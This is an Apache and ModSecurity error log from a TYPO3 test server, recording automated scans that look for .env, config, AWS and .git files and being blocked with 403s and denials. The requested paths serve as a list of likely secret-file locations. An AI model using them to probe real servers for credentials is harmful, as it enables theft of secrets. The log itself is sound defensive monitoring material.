[Sun Jul 27 09:04:51.144684 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjRQAAABY"]
[Sun Jul 27 09:04:51.144819 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjRQAAABY"]
[Sun Jul 27 09:04:52.470577 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Jul 27 09:04:52.712471 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Sun Jul 27 09:04:52.878461 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Sun Jul 27 09:04:53.431785 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Sun Jul 27 09:04:53.531319 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Jul 27 09:04:54.195959 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Sun Jul 27 09:04:54.255147 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Sun Jul 27 09:04:54.275721 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sun Jul 27 09:04:54.409875 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Sun Jul 27 09:04:54.430167 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Sun Jul 27 09:04:54.487637 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Sun Jul 27 09:04:54.507899 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml
[Sun Jul 27 09:04:54.603864 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/main.yml
[Sun Jul 27 09:04:54.922266 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aIXPluNyV_5diW48PsXyEgAAAA4"]
[Sun Jul 27 09:04:54.922518 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aIXPluNyV_5diW48PsXyEgAAAA4"]
[Sun Jul 27 09:04:54.922719 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aIXPluNyV_5diW48PsXyEgAAAA4"]
[Sun Jul 27 09:04:54.943112 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aIXPluNyV_5diW48PsXyEwAAAA4"]
[Sun Jul 27 09:04:54.943325 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aIXPluNyV_5diW48PsXyEwAAAA4"]
[Sun Jul 27 09:04:54.943483 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aIXPluNyV_5diW48PsXyEwAAAA4"]
[Sun Jul 27 09:04:54.963652 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aIXPluNyV_5diW48PsXyFAAAAA4"]
[Sun Jul 27 09:04:54.963850 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aIXPluNyV_5diW48PsXyFAAAAA4"]
[Sun Jul 27 09:04:54.963999 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.envs/.production/.django"] [unique_id "aIXPluNyV_5diW48PsXyFAAAAA4"]
[Sun Jul 27 09:04:55.159057 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yaml
[Sun Jul 27 09:04:55.201848 2025] [authz_core:error] [pid 1495868] [client 185.177.72.115:13848] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.yml
[Sun Jul 27 09:04:55.272057 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHAAAAA4"]
[Sun Jul 27 09:04:55.272288 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHAAAAA4"]
[Sun Jul 27 09:04:55.272446 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHAAAAA4"]
[Sun Jul 27 09:04:55.292847 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHQAAAA4"]
[Sun Jul 27 09:04:55.293058 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHQAAAA4"]
[Sun Jul 27 09:04:55.293216 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/myproject/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHQAAAA4"]
[Sun Jul 27 09:04:55.336964 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHgAAAA4"]
[Sun Jul 27 09:04:55.337188 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHgAAAA4"]
[Sun Jul 27 09:04:55.337370 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node-api/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHgAAAA4"]
[Sun Jul 27 09:04:55.397033 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nextjs-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHwAAAA4"]
[Sun Jul 27 09:04:55.397268 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHwAAAA4"]
[Sun Jul 27 09:04:55.397454 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nextjs-app/.env"] [unique_id "aIXPl-NyV_5diW48PsXyHwAAAA4"]
[Sun Jul 27 09:04:55.502009 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aIXPl-NyV_5diW48PsXyIQAAAA4"]
[Sun Jul 27 09:04:55.502233 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aIXPl-NyV_5diW48PsXyIQAAAA4"]
[Sun Jul 27 09:04:55.502444 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env"] [unique_id "aIXPl-NyV_5diW48PsXyIQAAAA4"]
[Sun Jul 27 09:04:55.523539 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aIXPl-NyV_5diW48PsXyIgAAAA4"]
[Sun Jul 27 09:04:55.523744 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aIXPl-NyV_5diW48PsXyIgAAAA4"]
[Sun Jul 27 09:04:55.523898 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/react-app/.env.production"] [unique_id "aIXPl-NyV_5diW48PsXyIgAAAA4"]
[Sun Jul 27 09:04:55.619175 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aIXPl-NyV_5diW48PsXyJQAAAA4"]
[Sun Jul 27 09:04:55.619393 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aIXPl-NyV_5diW48PsXyJQAAAA4"]
[Sun Jul 27 09:04:55.619579 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aIXPl-NyV_5diW48PsXyJQAAAA4"]
[Sun Jul 27 09:04:55.639775 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aIXPl-NyV_5diW48PsXyJgAAAA4"]
[Sun Jul 27 09:04:55.639979 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aIXPl-NyV_5diW48PsXyJgAAAA4"]
[Sun Jul 27 09:04:55.640136 2025] [:error] [pid 1495868] [client 185.177.72.115:13848] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aIXPl-NyV_5diW48PsXyJgAAAA4"]
[Sun Jul 27 17:16:25.018321 2025] [authz_core:error] [pid 1495868] [client 93.123.109.7:57552] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jul 29 11:36:14.349062 2025] [authz_core:error] [pid 1545981] [client 93.123.109.64:33408] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Jul 29 11:36:56.994608 2025] [authz_core:error] [pid 1540883] [client 93.123.109.64:41126] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Jul 30 18:17:23.877405 2025] [:error] [pid 1567421] [client 217.217.252.19:57084] [client 217.217.252.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIpFky_7ckd4YAu8yBhneQAAAAc"]
